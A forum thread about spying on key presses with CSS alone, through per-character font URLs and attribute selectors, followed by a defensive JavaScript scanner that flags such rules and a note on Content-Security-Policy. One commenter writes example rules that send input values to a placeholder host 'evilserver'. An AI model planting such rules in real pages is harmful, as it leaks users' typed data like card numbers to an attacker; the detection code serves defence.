
There’s an interesting technique to spy on key presses. Basically you have to use a custom font where each character loads from a different font URL. The browser will issue corresponding requests as you press your buttons. It won’t detect identical characters but it might steal enough to brute force the rest. And it works with no JS.



That’s what I thought this method was. Repeating characters would kill that method since you don’t know which character was repeated and, more importantly, where. Even in the best situation you have to guess 4 digits and their positions 1 through 16. That sounds like a lot of guessing.


Yes, not ideal. But maybe someone might develop even better methods. Imagine something like

    input[value~="12"] { background-image: url(http://evilserver/12); }
    input[value~="13"] { background-image: url(http://evilserver/13); }

It's just a rough idea, but there are numerous methods to dynamically leak information through CSS.
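A defender-side check for the two patterns discussed in this thread, added here as an example and not written by any commenter: it scans a stylesheet for rules that key on an input's `value` attribute, or for `@font-face` rules limited to a single character, and that fetch from another origin. The function names, the page origin `https://shop.example` and the sample stylesheet are assumptions constructed for the example; it also assumes the per-character font is declared with `unicode-range`, and only `evilserver` comes from the thread.

```javascript
// Added example: flag CSS rules that can report typed input without JavaScript.
// SAMPLE_CSS is constructed; "evilserver" is the placeholder host used in the thread.
const SAMPLE_CSS = `
input[value~="12"] { background-image: url(http://evilserver/12); }
input[type="text"] { background-image: url(/img/field.png); }
@font-face { font-family: k; src: url(http://evilserver/a); unicode-range: U+0061; }
@font-face { font-family: body; src: url(/fonts/body.woff2); unicode-range: U+0000-00FF; }
`;

const RULE = /([^{}]+)\{([^{}]*)\}/g;                      // innermost "selector { decls }" blocks
const URL_FN = /url\(\s*['"]?([^'")\s]+)['"]?\s*\)/gi;     // url(...) targets
const VALUE_ATTR = /\[\s*value\s*[~|^$*]?=/i;              // [value=], [value~=], [value^=], ...
const SINGLE_CODEPOINT = /unicode-range\s*:\s*U\+[0-9a-f]{1,6}\s*(;|$)/i;

// Return http(s) URLs in a declaration block that resolve outside the page's origin.
function externalUrls(decls, pageOrigin) {
  const origin = new URL(pageOrigin).origin;
  const out = [];
  for (const m of decls.matchAll(URL_FN)) {
    let u;
    try { u = new URL(m[1], pageOrigin); } catch { continue; }
    if (/^https?:$/.test(u.protocol) && u.origin !== origin) out.push(u.href);
  }
  return out;
}

// Return one finding per rule that pairs a leak-capable selector with a cross-origin fetch.
function findCssLeakRules(css, pageOrigin) {
  const findings = [];
  const text = css.replace(/\/\*[\s\S]*?\*\//g, '');      // drop comments first
  for (const [, rawSel, decls] of text.matchAll(RULE)) {
    const selector = rawSel.trim();
    const urls = externalUrls(decls, pageOrigin);
    if (urls.length === 0) continue;                       // same-origin or data: only
    if (VALUE_ATTR.test(selector)) {
      findings.push({ kind: 'value-selector', selector, urls });
    } else if (/^@font-face$/i.test(selector) && SINGLE_CODEPOINT.test(decls.trim())) {
      findings.push({ kind: 'per-character-font', selector, urls });
    }
  }
  return findings;
}

console.log(findCssLeakRules(SAMPLE_CSS, 'https://shop.example'));
```

A finding here is a prompt to review where the stylesheet came from; a Content-Security-Policy that restricts `style-src`, `img-src` and `font-src` to trusted origins blocks the outbound requests these rules depend on.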



